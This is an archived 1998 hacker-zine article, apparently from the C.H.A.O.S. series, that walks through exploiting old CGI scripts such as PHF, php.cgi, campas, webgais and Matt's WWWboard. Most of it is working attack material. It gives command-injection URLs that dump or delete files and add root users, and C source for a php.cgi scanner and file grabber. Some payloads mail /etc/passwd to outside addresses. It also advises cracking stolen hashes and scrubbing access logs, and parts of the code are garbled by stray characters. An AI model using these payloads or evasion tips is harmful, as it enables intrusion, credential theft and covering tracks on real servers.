Freaks Macintosh Archive

home *** CD-ROM | disk | FTP | other *** search

/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / C.H.A.O.S / C.H.A.O.S. 2.sea / C.H.A.O.S. 2 / C.H.A.O.S. v2.0.rsrc / TEXT_135.txt < prev next >

Wrap

Text File | 1998-11-17 | 12KB | 433 lines

CGI: Fun with EXPLOITS This is a great article on CGI and their exploits. Please excuse the grammmer but it is VERY good reading. Hitman did a great job. Keep it up. by Da Hitman (daemon@mac-addict.com) www.neverness.net/MaCrack **With special help from HardCoded‚Ä†** >--==--[Intro]--==--< This text will primarily concern CGI ( Common Gateway Interface ) scripts/software and their many holes/bugs and how a hacker can exploit them to grab hold of the fabled passwd file and do other misc stuff ex; 1.Grab the passwd file http://www.target.com/cgi-bin/query?%0a/bin/cat%20/etc/passwd 2.read any file on the system http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ 3.Delete files on the system http://www.target.com/cgi-bin/phf?Q=%0a/bin/rm%20/home/bob/loveletter.txt and more... gr00vy?K letz get started. [CGI Holes and How to Exploit Them] --< PHF Exploit >--- The most famous/outdated exploit in my opinion is the PHF(packet handler function) exploit. The PHF exploit is/was an hole in most servers that allowed u to access the passwd file without a login or pass and/or delete any file on the system. You would aquire the passwd file by adding a string to the URL in your bowser like this http://www.target.com/cgi-bin/phf?Q=%0a/bin/cat%20/etc/passwd or.. http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd or... http://www.target.com/cgi-bin/phf?Q=%0a/bin/ypcat%20passwd Some foreign servers are still vulnerable to this exploit. But usually you will get a message saying "The requested object does not exist on this server. The link you followed is either outdated, inaccurate,or the server has been instructed not to let you have it." If u get a blinking message saying "You have been caught on Candid Camera!" don‚Äôt piss in yer pants they rarely ever report u. But if u get.... root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh sysadm:ufcNtKNYj7m9I:0:0: bin:*:2:2:Admin :/bin: sys:*:3:3:Admin :/usr/src: adm:*:4:4:Admin :/usr/adm:/sbin/sh nobody:*:65534:65534::/: ftp:*:39:39:FTP guest login:/var/ftp: dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh joet√´est:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh consider yerself lucky. You have the passwd file. Use MacCrac or another password cracker to try to ‚Äúcrack‚Äù it. If u do actually ‚Äúcrack‚Äù the passwd file and choose to login and hax0r the box then remember to audit the logs,especially the most important log /usr/local/etc/httpd/logs/access_log file and if it has it... /www/logs because it will have logged your phf usage. u can also view any file on the system by typing in the broswer http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ or if u wanna get caught real quick u can do this lil trick which adds a new user with root privs. ;) don‚Äôt choose a login that the admin might notice. try manager or sys something. ;D ------------------------------------------------------------------------------ http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/adduser%20hitty %20hitty%20100%20 then.... http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/chuid%20hitty%0 then... http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500 try telneting in and u might have w00t. :) and u might land yerself in jail if u do not be careful and realize that most admins with the PHF cgi know/been told of this old ass exploit. :) --< PHP Exploit >-- The programs phpscan.c and phpget.c together exploit a hole in the php.cgi code which allows remote users to read ANY file on the system that the http daemon has access too. You use phpscan.c to scan from a list of hosts and phpget.c to retreive files from the host. phpscan.c ---CUT----- /* phpscan.c : php.cgi vunerable server scanning program. Basically a modified phf scanner, by Alhambra of The Guild. Modifications to php.cgi by so1o of The CodeZero. Usage: phpscan <infile> <outfile> */ #include <sys/stat.h> #include <sys/types.h> #include <termios.h> #include <unistd.h> #include <stdio.h> #include <fcntl.h> #include <sys/syslog.h> #include <sys/param.h> #include <sys/times.h> #ifdef LINUX #include <sys/time.h> #endif #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/signal.h> #include <arpa/inet.h> #include <netdb.h> int FLAG = 1; int Call(int signo) { FLAG = 0; } main (int argc, char *argv[]) { char host[100], buffer[1024], hosta[1024],FileBuf[8097]; int outsocket, serv_len, len,X,c,outfd; struct hostent *nametocheck; st√ìruct sockaddr_in serv_addr; struct in_addr outgoing; char PHPMessage[]="GET cgi-bin/php.cgi?/etc/passwd\n"; while(fgets(hosta,100,stdin)) { if(hosta[0] == '\0') break; hosta[strlen(hosta) -1] = '\0'; write(1,hosta,strlen(hosta)*sizeof(char)); write(1,"\n",sizeof(char)); outsocket = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family = AF_INET; nametocheck = gethostbyname (hosta); (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],sizeof (outgoing.s_addr)); strcpy (host, inet_ntoa (outgoing)); serv_addr.sin_addr.s_addr = inet_addr (host); serv_addr.sin_port = htons (80); signal(SIGALRM,Call); FLAG = 1; alarm(10); X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); alarm(0); if(FLAG == 1 && X==0){ write(outsocket,PHPMessage,strlen(PHPMessage)*sizeof(c√àhar)); while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X); } close (outsocket); } return 0; } phpget.c ---CUT--- /* p1 (peewun@heterosexual.com) This code retrieves a file using php.cgi on a remote system. This program is for educational purposes only. Use it on p1.com. */ #include <signal.h> #include <stdio.h> #include <sys/param.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdarg.h> #include <string.h> FILE *server; int sock; void do_connect(char *host, char *toget); void do_connect(char *host, char *toget) { char inbuf[1024]; struct sockaddr_in sin; struct hostent *hp; char *tmpbuf; hp = gethostbyname(host); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(80); sock = socket(AF_INET, SOCK_STREAM, 0); if ( -1 < connect(sock, (struct sockaddr *) &sin, sizeof(sin)) ) { prin%tf("Made connection to %s.\n\n", host); } else { printf("Failed to connect to %s.\n\n",host); exit(0); } server=fdopen(sock, "a+"); fprintf(server, "GET /cgi-bin/php.cgi?%s\n",toget); printf("Output from php.cgi request:\n\n"); while(1){ if (fgets(inbuf, 1024, server) == NULL) break; printf(inbuf); } } main(int argc,char **argv) { printf("\nThis program retrieves files off a remote system using php.cgi.\n"); printf("Author: p1 - peewun@heterosexuÀùal.com\n"); if (argc < 3) { printf("Usage: %s <domain> <path and file>\n",argv[0]); printf(" Ex: %s www.p1.com /etc/passwd\n",argv[0]); } else { char *buffer; (char *)"exit"; do_connect(argv[1],argv[2]); exit(1); } } ---CUT--- or you can just do... http://www.target.com/cgi-bin/php.cgi?../../../etc/passwd :) --< Webgais >-- WebGais is an interface to the GAIS search tool. The main utility is webgais and does the interfacing with the GAIS search tool. Here‚Äôs how we would sploit this h1tman@public$ telnet target.com 80 Trying 206.X.5.X... Connected to target.com. Escape character is '^]'. POST /cgi-bin/webgais HTTP/1.0 Content-length: 85 (replace wit exploit string) query=';mail+hitty\@n2computers.com</etc/passwd;echo'&output=subject&domain=paragraph --< Campas >-- The campus CGI is very similar to the PHF. Using it can allow u to view any file on the system. Here‚Äôs how j00 would sploit da mutha. ;D h1tman@public$ telnet target.com 80 Trying 200.xx.xx.xx... Connected to target.com Escape character is '^]'. GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a <PRE> root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh sysadm:ufcNtKNYj7m9I:0:0: bin:*:2:2:Admin :/bin: sys:*:3:3:Admin :/usr/src: adm:*:4:4:Admin :/usr/adm:/sbin/sh nobody:*:65534:65534::/: ftp:*:39:39:FTP guest login:/var/ftp: joeblow:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh test:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh or in your bowser type http://www.target.com/‚áßcgi-bin/campas?%0a/bin/cat%0a/etc/passwd --< info2www >-- The info2www CGI script changes GNU files to ‚Äúinfo‚Äù files but doesn‚Äôt check user-provided filenames before opening them thus allowing us to open the system‚Äôs files and execute shell commands. ex; $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)' $ You have new mail. $ oh jinkies!it just mailed us the passwd file! :) --< Matt‚Äôs WWWboard script >-- Matt should stop making these scripts, really no joke. He is like handing away a timebomb to a sys admin. Lets take a look at one of his exploitable scripts. (lets not mention the textcounter.pl script for his sake.) [WWWboard Script] This script is very easily exploitable. By default you have ta put the passwd.txt file in the same directory as your wwwboard. So what does that mean?It means that itz sploitin time! Here‚Äôs how we do it change http://www.dumbassguywhohasmattscript.com/wwwboard/ to... http://www.dumbassguywhohasmattscript.com/wwwboard/passwd.txt you should very well get dumbguy:ufcNtKNYj7m9I All we do know is add some stuff behind the encrypted passwd file. The things i am adding is just the User ID, Group ID, home dir, shell, etc. This is because we are gonna run a passwd cracker on it and since matt uses the same encrytpion scheme that is vulnerable to the brute force dictionary attack. (i told u he is a dumbass) dumbguy:ufcNtKNYj7m9I:101:100:Dumb Ass:/home/dass:/sbin/sh run the passwd cracker and walla u have the password! Now u have access to delete/edit files on the victim‚Äôs WWWboard! --< NPH-TEST CGI >-- This script can be exploited to obtain a file listing of any directory on the server. Here‚Äôs an example how we would exploit this script. http://www.target.com/cgi-bin/nph-test-cgi?/* --==--[The Top 5 Exploitable CGI Scripts/Programs]--==-- I rounded up all the vulnerable cgi scripts/programs and decided which was my fave and the most popular(now or at the time) and i posted them down below. :) PHF Exploit: http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd TEST-CGI Exploit: http://www.target.com/cgi-bi0n/test-cgi?\help&0a/bin/cat%20/etc/passwd CAMPAS Exploit: http://www.target.com/cgi-bin/campas?%0a/bin/cat%0a/etc/passwd HTMLSCRIPT Exploit: http://www.target.com/cgi-bin/htmlscript?../../../../etc/passwd PHP Exploit: grab da C programs up dere and compile on a UN*X OS. Compile by typing gcc -o phpscan phpscan.c or cc o- phpscan phpscan.c --==--[Other CGI Scripts/Programs]--==-- Eheh these are other programs/scripts that i am to lazy to try to detail. i will just show how to exploit. ;P --< Handler >-- telnet target.com 80 GET1 /cgi-bin/handler/whoyodaddy;cat /etc/passwd|?data=Download HTTP/1.0 --< View - Source >-- http://www.target.com/cgi-bin/view-source?../../../../../../../etc/passwd --==--[Conclusion]--==-- Hopefully this small lame file gave u some information on each CGI program and how to exploit it. I rather have u to have some knowledge rather than running xCGI on a site and not knowing what the hell campas/php/webgais,etc is or does. ;D if i left sumtin out or maybe missed an important exploit,KINDLY email me and tell me of da prob. ;) -mad werd Great job Hitman. ¬†